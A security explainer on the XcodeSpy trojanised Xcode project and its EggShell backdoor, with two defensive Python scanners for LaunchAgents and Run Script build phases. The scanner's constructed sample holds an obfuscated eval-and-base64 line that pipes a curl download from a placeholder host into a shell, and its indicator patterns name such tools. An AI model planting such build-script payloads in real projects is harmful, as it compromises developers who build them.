
XcodeSpy Malware

Cybercriminals have been steadily shifting towards supply-chain attacks: compromising a single upstream entity lets them reach numerous downstream victims. Infosec researchers have uncovered one such campaign aimed at Apple developers. The threat actors abuse the Run Script build phase of Apple's Xcode IDE to distribute a Trojanized Xcode project. The new threat has been named XcodeSpy.

XcodeSpy is a malicious Xcode project designed to install an EggShell backdoor on the compromised macOS system and to set up a persistence mechanism that keeps it there. The attackers injected XcodeSpy into a legitimate open-source project, TabBarInteraction, which is available on GitHub. The legitimate TabBarInteraction project gives developers advanced options for animating the iOS Tab Bar and its interaction with the user.

The version carrying XcodeSpy, however, has been modified to include an obfuscated Run Script that executes whenever the developer builds and launches the build target. The malicious script contacts the Command-and-Control (C2, C&C) infrastructure set up by the attackers and fetches a custom variant of the EggShell backdoor. Upon execution, the backdoor's first action is to establish persistence: it drops a LaunchAgent in one of two locations:

~/Library/LaunchAgents/com.apple.usagestatistics.plist or ~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist.

The LaunchAgent checks whether the original executable is running. If it is not, it fetches and executes a copy from a so-called 'master' version stored at ~/Library/Application Support/com.apple.AppStore/.update.
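The persistence mechanism described above leaves a recognisable shape in ~/Library/LaunchAgents: an Apple-looking label in a per-user folder, and an agent that re-launches a hidden file staged under Application Support. The following script, an added example written for this page rather than code from the researchers or the malware, audits a LaunchAgents directory for that shape. The sample plists it writes are constructed for the demo and are modelled on the page's description of the XcodeSpy agent, not copied from it; the inline-shell and dotfile heuristics are assumptions that generalise the technique to other names.

```python
"""Audit a per-user LaunchAgents folder for agents shaped like the XcodeSpy persistence."""
import plistlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List

HIDDEN_PATH_RE = re.compile(r"/\.[A-Za-z0-9_]")  # a dotfile path component such as /.update


def _reasons(label: str, argv: List[str]) -> List[str]:
    """Heuristics: the first three follow the page's description of the XcodeSpy agent,
    the last is an assumption that generalises it to other inline-shell agents."""
    cmdline = " ".join(argv)
    reasons = []
    if label.startswith("com.apple."):
        # Apple ships its own agents under /System/Library and /Library, not in ~/Library.
        reasons.append("com.apple.* label in a per-user LaunchAgents folder")
    if HIDDEN_PATH_RE.search(cmdline):
        reasons.append("runs or references a hidden (dotfile) executable")
    if "Application Support" in cmdline:
        reasons.append("payload staged under Library/Application Support")
    if argv[:2] in (["/bin/sh", "-c"], ["/bin/bash", "-c"], ["/bin/zsh", "-c"]):
        reasons.append("agent body is an inline shell one-liner")
    return reasons


def audit_launch_agents(agents_dir: Path) -> List[Dict]:
    """Return one finding per plist that trips at least one heuristic."""
    findings = []
    for plist_path in sorted(agents_dir.glob("*.plist")):
        try:
            with plist_path.open("rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:  # an unparseable agent is itself worth a look
            findings.append({"path": str(plist_path), "label": plist_path.stem,
                             "argv": [], "reasons": [f"unparseable plist: {exc}"]})
            continue
        label = str(plist.get("Label", plist_path.stem))
        argv = [str(a) for a in (plist.get("ProgramArguments") or [plist.get("Program", "")])]
        reasons = _reasons(label, argv)
        if reasons:
            findings.append({"path": str(plist_path), "label": label, "argv": argv, "reasons": reasons})
    return findings


def write_sample_agents(agents_dir: Path) -> None:
    """Constructed samples: one modelled on the XcodeSpy agent (not its real contents), one benign."""
    modelled_on_xcodespy = {
        "Label": "com.apple.usagestatistics",
        "ProgramArguments": ["/bin/sh", "-c",
                             'pgrep -xq .update || "$HOME/Library/Application Support/com.apple.AppStore/.update" &'],
        "RunAtLoad": True,
        "StartInterval": 300,
    }
    benign = {
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
        "StartCalendarInterval": {"Hour": 2, "Minute": 0},
    }
    for plist in (modelled_on_xcodespy, benign):
        with (agents_dir / f"{plist['Label']}.plist").open("wb") as fh:
            plistlib.dump(plist, fh)


def demo() -> List[Dict]:
    """Run the audit on the constructed samples in a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_agents(Path(tmp))
        return audit_launch_agents(Path(tmp))


if __name__ == "__main__":
    # Report the demo findings first, then whatever is in the real per-user folder.
    for finding in demo() + audit_launch_agents(Path.home() / "Library" / "LaunchAgents"):
        print(finding["path"], finding["argv"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Run it as-is to see the constructed sample flagged on all four heuristics while the benign backup agent stays silent; pointing `audit_launch_agents` at a different directory (for example a mounted image of a suspect user's home) works the same way.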

The EggShell backdoor then proceeds to its main purpose: spying on the victim. It can record from the user's microphone and camera and log keystrokes, and all collected data is exfiltrated to a remote server. The backdoor also lets the threat actor drop additional files onto the compromised system.

While the techniques employed by XcodeSpy are not especially sophisticated, they could easily be replicated to plant malicious Run Scripts in any shared Xcode project. Apple developers are advised to inspect any third-party Xcode project they plan to adopt for suspicious or malicious Run Script build phases before building it.
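One way to do that inspection without opening the project in Xcode is to read the project.pbxproj file directly, list every PBXShellScriptBuildPhase object, and apply a few indicators for the behaviour described above (decoding and eval'ing a blob, fetching from the network, piping into an interpreter, backgrounding with output silenced). The scanner below is an added example written for this page, not code from the researchers or from the TabBarInteraction project. The pbxproj excerpt it scans is constructed for the demo: the "Run Script" phase is built the way XcodeSpy's was, but its base64 payload and the example.invalid URL are placeholders, and the indicator patterns are assumptions that generalise beyond the one script the page describes.

```python
"""Enumerate the Run Script build phases in an Xcode project.pbxproj and flag the ones
that decode, fetch, or background-execute code the way the trojanised project above does."""
import base64
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional

# project.pbxproj is an old-style plist; every object reads "<24 hex digits> /* comment */ = { ... };".
# Adjust the id pattern if a project uses a different object-id scheme.
OBJECT_RE = re.compile(r"^\s*([0-9A-F]{24}) /\* (.*?) \*/ = \{(.*?)^\s*\};", re.M | re.S)
# shellScript (and a quoted name) is a double-quoted string with backslash escapes (\n, \", \\).
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
NAME_RE = re.compile(r'^\s*name = (?:"((?:[^"\\]|\\.)*)"|([^;]+));', re.M)
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicator heuristics (assumptions generalising the behaviour the page describes).
INDICATORS = [
    ("decode-and-execute", re.compile(r"\beval\b|base64\s+(?:-D|-d|--decode)|\bxxd\s+-r|openssl\s+enc\s+-d")),
    ("network fetch", re.compile(r"\b(?:curl|wget|nscurl)\b")),
    ("pipe to interpreter", re.compile(r"\|\s*(?:sh|bash|zsh|python\d?|perl|ruby|osascript)\b")),
    ("persistence", re.compile(r"LaunchAgents|LaunchDaemons|\blaunchctl\b")),
    ("backgrounded/silenced", re.compile(r"\bnohup\b|/dev/null\s+2>&1\s*&")),
]


@dataclass
class RunScriptPhase:
    object_id: str
    name: str
    script: str
    decoded_blobs: List[str] = field(default_factory=list)
    indicators: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def _unescape(s: str) -> str:
    """Undo the pbxproj string escapes so the script reads as it would run."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def _try_decode(blob: str) -> Optional[str]:
    """Return the decoded text of a base64 literal if it decodes to printable ASCII."""
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and all(c.isprintable() or c in "\n\t" for c in text) else None


def scan_pbxproj(text: str) -> List[RunScriptPhase]:
    """Return every PBXShellScriptBuildPhase in the file, with indicators attached."""
    phases = []
    for object_id, comment, body in OBJECT_RE.findall(text):
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        m = SCRIPT_RE.search(body)
        script = _unescape(m.group(1)) if m else ""
        n = NAME_RE.search(body)
        name = _unescape(n.group(1) if n.group(1) is not None else n.group(2)) if n else comment
        phase = RunScriptPhase(object_id, name, script)
        # Decode embedded base64 so indicators hidden inside the blob are checked as well.
        phase.decoded_blobs = [d for d in map(_try_decode, BASE64_RE.findall(script)) if d]
        for label, pattern in INDICATORS:
            if any(pattern.search(s) for s in [script, *phase.decoded_blobs]):
                phase.indicators.append(label)
        phases.append(phase)
    return phases


def scan_project(xcodeproj: Path) -> List[RunScriptPhase]:
    """Scan Foo.xcodeproj/project.pbxproj on disk."""
    return scan_pbxproj((xcodeproj / "project.pbxproj").read_text(encoding="utf-8"))


# Constructed sample: a benign SwiftLint phase plus a phase shaped like XcodeSpy's (placeholder payload).
_PAYLOAD = base64.b64encode(b"curl -s http://example.invalid/drop | sh").decode()
SAMPLE_PBXPROJ = f'''// !$*UTF8*$!
{{
    objects = {{
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4E5F60718293A4B5C /* SwiftLint */ = {{
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = SwiftLint;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\\n";
        }};
        0011223344556677889900AA /* Run Script */ = {{
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            shellPath = /bin/sh;
            showEnvVarsInLog = 0;
            shellScript = "eval \\"$(echo {_PAYLOAD} | base64 -D)\\" >/dev/null 2>&1 &\\n";
        }};
/* End PBXShellScriptBuildPhase section */
    }};
}}
'''

if __name__ == "__main__":
    for p in scan_pbxproj(SAMPLE_PBXPROJ):
        print(f"[{'SUSPICIOUS' if p.suspicious else 'ok'}] {p.object_id} {p.name!r}: {p.indicators}")
        for d in p.decoded_blobs:
            print("    decodes to:", d)
```

Run it against a real checkout with `scan_project(Path("Foo.xcodeproj"))`; the point of decoding base64 literals before matching is that an obfuscated script shows almost none of the indicators in its raw form, while its decoded payload shows the fetch and the pipe into a shell. Treat any phase that trips an indicator as something to read in full before building, and remember that `showEnvVarsInLog = 0` and a generic name like "Run Script" are normal in honest projects too, so they are not used as indicators here.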
